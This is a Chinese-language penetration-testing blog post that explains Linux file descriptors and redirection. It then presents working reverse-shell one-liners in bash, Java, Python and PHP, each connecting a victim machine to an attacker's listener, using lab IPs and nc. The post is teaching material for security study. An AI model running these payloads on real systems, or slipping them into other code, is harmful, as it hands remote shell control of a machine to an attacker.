<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/toux.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/toux.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/toux.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/toux.jpg?v=5.1.4" color="#222">





  <meta name="keywords" content="Linux,反弹 shell,">





  <link rel="alternate" href="/atom.xml" title="peri0d的博客" type="application/atom+xml">






<meta name="description" content="文件描述符与重定向文件描述符 文件描述符是一个非负整数，它指向一个打开的文件，可以理解为指针指向打开的文件，但它并不是指针 实际上，它是一个索引值，指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时，内核向进程返回一个文件描述符。一般适用于 Linux 和 Unix 系统 也可以理解为文件的身份 ID，用于表明每个被进程打开的文件 每一个文件描述符会与一">
<meta name="keywords" content="Linux,反弹 shell">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux 反弹 shell">
<meta property="og:url" content="http://yoursite.com/2019/07/23/反弹 shell/index.html">
<meta property="og:site_name" content="peri0d的博客">
<meta property="og:description" content="文件描述符与重定向文件描述符 文件描述符是一个非负整数，它指向一个打开的文件，可以理解为指针指向打开的文件，但它并不是指针 实际上，它是一个索引值，指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时，内核向进程返回一个文件描述符。一般适用于 Linux 和 Unix 系统 也可以理解为文件的身份 ID，用于表明每个被进程打开的文件 每一个文件描述符会与一">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_1.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_2.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_3.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_4.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_5.PNG">
<meta property="og:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_6.PNG">
<meta property="og:updated_time" content="2019-07-23T12:26:40.001Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux 反弹 shell">
<meta name="twitter:description" content="文件描述符与重定向文件描述符 文件描述符是一个非负整数，它指向一个打开的文件，可以理解为指针指向打开的文件，但它并不是指针 实际上，它是一个索引值，指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时，内核向进程返回一个文件描述符。一般适用于 Linux 和 Unix 系统 也可以理解为文件的身份 ID，用于表明每个被进程打开的文件 每一个文件描述符会与一">
<meta name="twitter:image" content="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_1.PNG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/23/反弹 shell/">





  <title>Linux 反弹 shell | peri0d的博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">peri0d的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">peri0d</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/23/反弹 shell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="peri0d">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/toux.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="peri0d的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Linux 反弹 shell</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-23T20:27:52+08:00">
                2019-07-23
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透/" itemprop="url" rel="index">
                    <span itemprop="name">渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="文件描述符与重定向"><a href="#文件描述符与重定向" class="headerlink" title="文件描述符与重定向"></a>文件描述符与重定向</h1><h2 id="文件描述符"><a href="#文件描述符" class="headerlink" title="文件描述符"></a>文件描述符</h2><ul>
<li>文件描述符是一个非负整数，它指向一个打开的文件，可以理解为指针指向打开的文件，但它并不是指针</li>
<li>实际上，它是一个索引值，指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时，内核向进程返回一个文件描述符。一般适用于 Linux 和 Unix 系统</li>
<li>也可以理解为文件的身份 ID，用于表明每个被进程打开的文件</li>
<li>每一个文件描述符会与一个打开文件相对应，同时，不同的文件描述符也会指向同一个文件</li>
<li>一般情况下，Linux 下的三个默认文件描述符如下 : <ul>
<li>0 表示标准输入，只读</li>
<li>1 表示标准输出，只写</li>
<li>2 表示标准错误输出，只写</li>
</ul>
</li>
<li>程序刚刚启动的时候，0 是标准输入，1 是标准输出，2 是标准错误输出。如果此时去打开一个新的文件，它的文件描述符会是 3 </li>
<li>在 Linux 中，一切都是文件，键盘显示器设备都是文件，它们的输入输出也由文件描述符控制</li>
</ul>
<h2 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h2><ul>
<li><p>重定向主要有两种 : </p>
<ul>
<li>输入重定向 <code>&lt;</code> : 对 0 重定向</li>
<li>输出重定向 <code>&gt;</code> : 对 1 重定向</li>
</ul>
</li>
<li><p>bash 在执行一条指令时，首先会处理重定向符号</p>
</li>
<li><p>如果指令中存在多个重定向，那么它的解析顺序是从左向右</p>
</li>
<li><p>输入重定向( <code>&lt;</code> )例子如下，首先解析器会先解析重定向，将标准输入指向 file，这时再使用 cat 从标准输入读取时，就会读取 file</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_1.PNG" alt></p>
</li>
<li><p>输出重定向( <code>&gt;</code> )例子如下，首先解析器会先解析重定向，将标准输出指向 file，这时使用 echo 输入字符串，就会直接输入到 file 中</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_2.PNG" alt></p>
</li>
<li><p>标准输出与标准错误输出重定向( <code>&amp;&gt;</code> )例子如下，首先，执行一个错误的命令，可以看到，错误输出到了 file 中，后面执行一个正确的命令，结果也输出到了 file 中。这两个命令等价于 <code>mkdir 1&gt; file 2&gt;&amp;1</code> 和 <code>ls 1&gt; file 2&gt;&amp;1</code></p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_3.PNG" alt></p>
</li>
<li><p>0、1、2 是默认的文件描述符，其之后的可以自行使用，例子如下，创建文件描述符 3 并指向 file，然后 cat 读取</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_4.PNG" alt></p>
</li>
<li><p>还有一种重定向，<code>&lt;&gt;</code> 表示同时对文件进行读写，例子如下。以读写模式打开 file 同时将文件描述符 6 指向 file，然后 cat 读取</p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_5.PNG" alt></p>
</li>
</ul>
<h1 id="反弹-shell"><a href="#反弹-shell" class="headerlink" title="反弹 shell"></a>反弹 shell</h1><h2 id="什么是反弹-shell"><a href="#什么是反弹-shell" class="headerlink" title="什么是反弹 shell"></a>什么是反弹 shell</h2><ul>
<li><p>就是控制端监听在某 TCP/UDP 端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。其本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。</p>
</li>
<li><p>假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面，web 服务，ssh，telnet 等等，都是正向连接。</p>
</li>
<li><p>那么什么时候使用反弹 shell 呢？</p>
<ul>
<li>靶机中了你的网马，但是它在局域网内，直接连接不了</li>
<li>靶机的 IP 会动态改变，不能持续控制</li>
<li>由于防火墙等限制，靶机只能发送请求，不能接收请求</li>
<li>对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知，所以建立一个服务端，让恶意程序主动连接，才是上策</li>
</ul>
</li>
<li><p>所谓反弹 shell，就是受害者连接攻击者指定的服务端，从而使攻击者 getshell</p>
</li>
<li><p>举个例子，靶机 : 192.168.233.132，攻击者 : 192.168.233.130，在攻击者上执行 <code>nc -lvp 4096</code> 监听 4096 端口，在靶机上执行 <code>bash -i &gt;&amp; /dev/tcp/192.168.233.130/4096 0&gt;&amp;1</code>，将会有如下界面 : </p>
<p><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/re_shell_6.PNG" alt></p>
</li>
</ul>
<h2 id="反弹-shell-分析"><a href="#反弹-shell-分析" class="headerlink" title="反弹 shell 分析"></a>反弹 shell 分析</h2><ul>
<li><code>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</code><ul>
<li><code>bash -i</code> 创建一个交互式 bash 进程</li>
<li><code>/dev/tcp/ip/port</code> 与 <code>IP:port</code> 建立一个 TCP 连接</li>
<li>这里相当于 <code>bash -i 1&gt; /dev/tcp/ip/port 2&gt;&amp;1</code> 先将文件描述符 1 重定向到 <code>/dev/tcp/ip/port</code> ，然后再将文件描述符 2 重定向到 <code>/dev/tcp/ip/port</code></li>
<li><code>0&gt;&amp;1</code> 将文件描述符 0 重定向到 <code>/dev/tcp/ip/port</code></li>
<li>最终所有的标准输入输出都在这个文件中，很明显完成了反弹 shell</li>
</ul>
</li>
<li><code>bash -i 5&lt;&gt;/dev/tcp/host/port 0&gt;&amp;5 1&gt;&amp;5</code><ul>
<li><code>5&lt;&gt;/dev/tcp/host/port</code> 以读写方式打开 <code>/dev/tcp/host/port</code>，并将文件描述符重定向到 <code>/dev/tcp/host/port</code></li>
<li><code>0&gt;&amp;5</code> 文件描述符 0 重定向到 5</li>
<li><code>1&gt;&amp;5</code> 文件描述符 1 重定向到 5</li>
<li>最终文件描述符 0 和 1都重定向到 <code>/dev/tcp/host/port</code> 完成 反弹 shell</li>
</ul>
</li>
<li><code>exec 5&lt;&gt;/dev/tcp/ip/port;cat &lt;&amp;5 | while read line; do $line &gt;&amp;5; done</code><ul>
<li><code>exec 5&lt;&gt;/dev/tcp/host/port</code> 以读写方式打开 <code>/dev/tcp/host/port</code>，并将文件描述符重定向到 <code>/dev/tcp/host/port</code></li>
<li><code>cat &lt;&amp;5</code> 将文件描述符 5 重定向到 cat 中，即 cat 读取 &amp;5 的内容，也即 cat 读取 <code>/dev/tcp/host/port</code> 中的内容</li>
<li><code>|</code> 将 cat 读取的结果作为后面的输入</li>
<li><code>while read line; do $line &gt;&amp;5; done</code> 循环读取 <code>cat &lt;&amp;5</code> 中的内容，赋值给 line，然后 $line 执行 line，最后 &gt;&amp;5 表示将 bash 的输出和错误重定向到文件描述符 5 中，即 <code>/dev/tcp/host/port</code> 中</li>
</ul>
</li>
</ul>
<h1 id="Java-反弹-shell"><a href="#Java-反弹-shell" class="headerlink" title="Java 反弹 shell"></a>Java 反弹 shell</h1><ul>
<li><p>基本方式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="keyword">new</span> String[]&#123;<span class="string">"/bin/bash"</span>,<span class="string">"-c"</span>,<span class="string">"exec 5&lt;&gt;/dev/tcp/ip/port;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done"</span>&#125;).waitFor();</span><br></pre></td></tr></table></figure>
</li>
<li><p>或者</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runtime.getRuntime().exec(<span class="keyword">new</span> String[]&#123;<span class="string">"/bin/bash"</span>,<span class="string">"-c"</span>,<span class="string">"bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1"</span>&#125;).waitFor();</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>/bin/bash</code> 是需要运行的程序，<code>-c</code> 和 <code>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</code> 都是作为 <code>/bin/bash</code> 的参数。<code>bash -c &quot;cmd string&quot;</code> 意为 shell 运行 <code>cmd string</code>，所以上述代码就是利用 shell 运行 <code>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</code></p>
</li>
</ul>
<h1 id="python-反弹-shell"><a href="#python-反弹-shell" class="headerlink" title="python 反弹 shell"></a>python 反弹 shell</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket,subprocess,os</span><br><span class="line">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">s.connect((<span class="string">"192.168.31.41"</span>,<span class="number">8080</span>))</span><br><span class="line">os.dup2(s.fileno(),<span class="number">0</span>)</span><br><span class="line">os.dup2(s.fileno(),<span class="number">1</span>)</span><br><span class="line">os.dup2(s.fileno(),<span class="number">2</span>)</span><br><span class="line">p=subprocess.call([<span class="string">"/bin/sh"</span>,<span class="string">"-i"</span>])</span><br></pre></td></tr></table></figure>

<h1 id="PHP-反弹-shell"><a href="#PHP-反弹-shell" class="headerlink" title="PHP 反弹 shell"></a>PHP 反弹 shell</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$sock=fsockopen(<span class="string">"192.168.31.41"</span>,<span class="number">8080</span>);</span><br><span class="line">exec(<span class="string">"/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3"</span>);</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          
            <a href="/tags/反弹-shell/" rel="tag"><i class="fa fa-tag"></i> 反弹 shell</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/28/CVE-2018-12613 复现/" rel="next" title="CVE-2018-12613 的一些思考">
                <i class="fa fa-chevron-left"></i> CVE-2018-12613 的一些思考
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/23/SpEL 注入/" rel="prev" title="SpEL 注入">
                SpEL 注入 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/toux.jpg" alt="peri0d">
            
              <p class="site-author-name" itemprop="name">peri0d</p>
              <p class="site-description motion-element" itemprop="description">待我尝尽世间甘苦，便喂你一勺甜。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">26</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://buuoj.cn" title="BUUCTF" target="_blank">BUUCTF</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://adworld.xctf.org.cn/" title="攻防世界" target="_blank">攻防世界</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#文件描述符与重定向"><span class="nav-number">1.</span> <span class="nav-text">文件描述符与重定向</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#文件描述符"><span class="nav-number">1.1.</span> <span class="nav-text">文件描述符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#重定向"><span class="nav-number">1.2.</span> <span class="nav-text">重定向</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#反弹-shell"><span class="nav-number">2.</span> <span class="nav-text">反弹 shell</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是反弹-shell"><span class="nav-number">2.1.</span> <span class="nav-text">什么是反弹 shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反弹-shell-分析"><span class="nav-number">2.2.</span> <span class="nav-text">反弹 shell 分析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Java-反弹-shell"><span class="nav-number">3.</span> <span class="nav-text">Java 反弹 shell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#python-反弹-shell"><span class="nav-number">4.</span> <span class="nav-text">python 反弹 shell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PHP-反弹-shell"><span class="nav-number">5.</span> <span class="nav-text">PHP 反弹 shell</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">peri0d</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="true"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
